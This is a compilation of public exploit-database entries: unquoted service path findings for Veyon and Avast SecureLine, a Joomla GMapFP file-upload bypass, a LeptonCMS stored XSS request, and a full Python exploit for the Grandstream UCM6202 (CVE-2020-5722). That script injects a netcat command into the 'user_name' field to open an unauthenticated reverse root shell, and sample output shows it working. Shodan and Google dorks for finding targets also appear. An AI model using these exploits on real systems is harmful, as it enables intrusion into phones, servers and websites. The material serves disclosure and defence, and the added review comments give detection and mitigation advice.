# Exploit Title: Veyon 4.3.4 - 'VeyonService' Unquoted Service Path # Discovery by: Víctor García # Discovery Date: 2020-03-23 # Vendor Homepage: https://veyon.io/ # Software Link: https://github.com/veyon/veyon/releases/download/v4.3.4/veyon-4.3.4.0-win64-setup.exe # Tested Version: 4.3.4 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Pro x64 # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ Veyon Service VeyonService C:\Program Files\Veyon\veyon-service.exe # Service info: C:\>sc qc VeyonService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VeyonService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Veyon\veyon-service.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Veyon Service DEPENDENCIES : Tcpip : RpcSs SERVICE_START_NAME : LocalSystem # Exploit: # A successful attempt would require the local user to be able to insert their code in the # system root path undetected by the OS or other security applications where it could # potentially be executed during application startup or reboot. If successful, the local # user's code would execute with the elevated privileges of the application.
-
UCM6202 1.0.18.13 - Remote Command Injection
# Exploit Title: UCM6202 1.0.18.13 - Remote Command Injection
# Date: 2020-03-23
# Exploit Author: Jacob Baines
# Vendor: http://www.grandstream.com
# Product Link: http://www.grandstream.com/products/ip-pbxs/ucm-series-ip-pbxs/product/ucm6200-series
# Tested on: UCM6202 1.0.18.13
# CVE : CVE-2020-5722
# Shodan Dork: ssl:"Grandstream" "Set-Cookie: TRACKID"
# Advisory: https://www.tenable.com/security/research/tra-2020-15
#
# NOTE(review): unauthenticated; the sink is the `user_name` field of the
# `action=sendPasswordEmail` request to the /cgi endpoint (port 8089 by default).
# The version gate below treats 1.0.19.20 and later as unaffected, which matches a
# fix in that firmware -- confirm against the Tenable advisory. Detection: POST
# bodies to /cgi with action=sendPasswordEmail whose user_name contains quotes,
# backticks or `${IFS}`; the unauthenticated `action=getInfo` probe that precedes
# it is a useful precursor signal. Mitigation: upgrade the firmware and keep the
# web UI off untrusted networks.
#
# Sample output:
# albinolobster@ubuntu:~$ python3 pbx_sploit.py --rhost 192.168.2.1 --lhost 192.168.2.107
# [+] Sending getInfo request to https://192.168.2.1:8089/cgi
# [+] Remote target info:
#       -> Model: UCM6202
#       -> Version: 1.0.18.13
# [+] Vulnerable version!
# [+] Sending exploit. Reverse shell to 192.168.2.107:1270
#
# albinolobster@ubuntu:~$ nc -lvp 1270
# Listening on [] (family 2, port)
# Connection from _gateway 41675 received!
# whoami
# root
# uname -a
# Linux UCM6202 3.0.35 #1 SMP PREEMPT Thu Jul 5 15:56:51 CST 2018 armv7l GNU/Linux
##

import os
import re
import sys
import json
import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# TLS verification is disabled for every request below (verify=False).
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

top_parser = argparse.ArgumentParser(description='')
top_parser.add_argument('--rhost', action="store", dest="rhost", required=True, help="The remote host to connect to")
top_parser.add_argument('--rport', action="store", dest="rport", type=int, help="The remote port to connect to", default=8089)
top_parser.add_argument('--lhost', action="store", dest="lhost", required=True, help="The local host to connect back to")
top_parser.add_argument('--lport', action="store", dest="lport", type=int, help="The local port to connect back to", default=1270)
args = top_parser.parse_args()

url = 'https://' + args.rhost + ':' + str(args.rport) + '/cgi'
print('[+] Sending getInfo request to ', url)

# Step 1: unauthenticated device fingerprint (model + firmware version).
try:
    resp = requests.post(url=url, data='action=getInfo', verify=False)
except Exception:
    print('[-] Error connecting to remote target')
    sys.exit(1)

if resp.status_code != 200:
    print('[-] Did not get a 200 OK on getInfo request')
    sys.exit(1)

# The body is expected to start with the literal '{ "response":' prefix.
if resp.text.find('{ "response":') != 0:
    print('[-] Unexpected response')
    sys.exit(1)

try:
    parsed_response = json.loads(resp.text)
except Exception:
    print('[-] Unable to parse json response')
    sys.exit(1)

print('[+] Remote target info: ')
print('\t-> Model: ', parsed_response['response']['model_name'])
print('\t-> Version: ', parsed_response['response']['prog_version'])

# NOTE(review): non-raw string with `\.` escapes; recent Python versions emit an
# invalid-escape warning for this, a raw string r'...' avoids it.
match = re.match('^([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)$', parsed_response['response']['prog_version'])
if not match:
    print('[-] Failed to extract the remote targets version')
    sys.exit(1)

major = int(match[1])
minor = int(match[2])
point = int(match[3])
patch = int(match[4])

# Version gate: anything >= 1.0.19.20 is treated as patched.
if (major > 1) or (major == 1 and minor > 0) or (major == 1 and minor == 0 and point > 19) or (major == 1 and minor == 0 and point == 19 and patch >= 20):
    print('[-] Unaffected version')
    sys.exit(1)
else:
    print('[+] Vulnerable version!')

print('[+] Sending exploit. Reverse shell to %s:%i' % (args.lhost, args.lport))

# Step 2: the injected user_name. It combines an `or 1=1--` fragment with a
# backtick command substitution, which suggests the value reaches both a
# database query and a shell on the device -- confirm against the advisory.
try:
    exploit = 'admin\' or 1=1--`;`nc${IFS}' + args.lhost + '${IFS}' + str(args.lport) + '${IFS}-e${IFS}/bin/sh`;`'
    resp = requests.post(url=url, data='action=sendPasswordEmail&user_name=' + exploit, verify=False)
except Exception as err:
    print('[-] Failed to send payload')
    sys.exit(1)

if resp.status_code != 200:
    print('[-] Did not get a 200 OK on sendPasswordEmail request')
    sys.exit(1)

try:
    parsed_response = json.loads(resp.text)
except Exception:
    print('[-] Unable to parse json response')
    sys.exit(1)

# status == 0 is only the device's own "request accepted" signal; it does not
# confirm that the injected command ran.
if parsed_response['status'] == 0:
    print('[+] Success! Clean exit.')
else:
    print('[-] Something bad happened.')
-
Joomla! Component GMapFP 3.30 - Arbitrary File Upload
# Exploit Title: Joomla! Component GMapFP 3.30 - Arbitrary File Upload # Google Dork: inurl:''com_gmapfp'' # Date: 2020-03-25 # Exploit Author: ThelastVvV # Vendor Homepage: https://gmapfp.org/ # Version: J3.30pro # Tested on: Ubuntu # PoC: http://127.0.0.1/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image # The upload restriction can be bypassed by uploading files with a double extension such as file.php.png, file2.php.jpeg, file3.html.jpg or file3.txt.jpg # Dir File Path: http://127.0.0.1/images/gmapfp/file.php or http://127.0.0.1//images/gmapfp/file.php.png # The Joomla GMapFP component 3.x allows remote attackers to upload arbitrary files (including web shells) because file uploads are not properly restricted
-
AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path
# Exploit Title: AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path # Discovery by: Roberto Piña # Discovery Date: 2020-03-24 # Vendor Homepage: https://www.avast.com/ # Software Link: https://www.avast.com/es-mx/download-thank-you.php?product=SLN&locale=es-mx # Tested Version: 5.5.522.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 8.1 Single Language x32 es # Steps to discover the Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Avast SecureLine" | findstr /i /v """ Avast SecureLine SecureLine C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe Auto C:\>sc qc SecureLine [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SecureLine TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Avast SecureLine DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem # Exploit: # A successful attempt would require the local user to be able to place their code in the system root path # undetected by the OS or other security applications, where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application (the service runs as LocalSystem, as shown above).
-
LeptonCMS 4.5.0 - Persistent Cross-Site Scripting
# Exploit Title: LeptonCMS 4.5.0 - Persistent Cross-Site Scripting # Google Dork: "lepton cms" # Date: 2019-03-24 # Exploit Author: SunCSR (Sun* Cyber Security Research) # Vendor Homepage: https://lepton-cms.org/english/home.php # Software Link: https://lepton-cms.org/posts/new-release-lepton-4.5.0-139.php # Version: 4.5.0 # Tested on: Windows # CVE : CVE-2020-12707 ### Vulnerability : Persistent Cross-Site Scripting # Description A stored cross-site scripting issue in the page edit feature URL: http://TARGET/lepton/backend/pages/modify.php Request Type: POST Vulnerable Parameter : "content" Payload : content=<script>alert('XSS')</script> #POC POST /lepton/modules/wysiwyg/save.php?leptoken=03d01fea73f9810402beez1585032684 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 79 Origin: http://TARGET Connection: close Referer: http://TARGET/lepton/backend/pages/modify.php?page_id=5&leptoken=f04ef2dc728873e9fa849z1585032680 Cookie: cookieconsent_status=dismiss; SESSc3618c3927e551a1d6443b365aef1bc3=_guGZcGkV8IUWJx91f8pVQo8aBpxO4ipp75Un8WQN-g; _ctr=MTI3XzBfMF8xLlpa; nv4_cltz=420.420.420%257C%252F%257C.thiennv.com; nv4_ctr=MTI3XzBfMF8xLlpa; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off; 5e71dbd610916_SESSION=bt38jrlr7ajgc28t6db10mdgu7; lep8407sessionid=6aqrn6ccetoeqdes68e44hdlul Upgrade-Insecure-Requests: 1 page_id=5&section_id=5&content5=<script>alert('XSS')</script> ### History ============= 2020-03-18 Issue discovered 2020-04-20 Vendor contacted 2020-04-21 Vendor response and hotfix 2020-04-23 Vendor releases fixed versions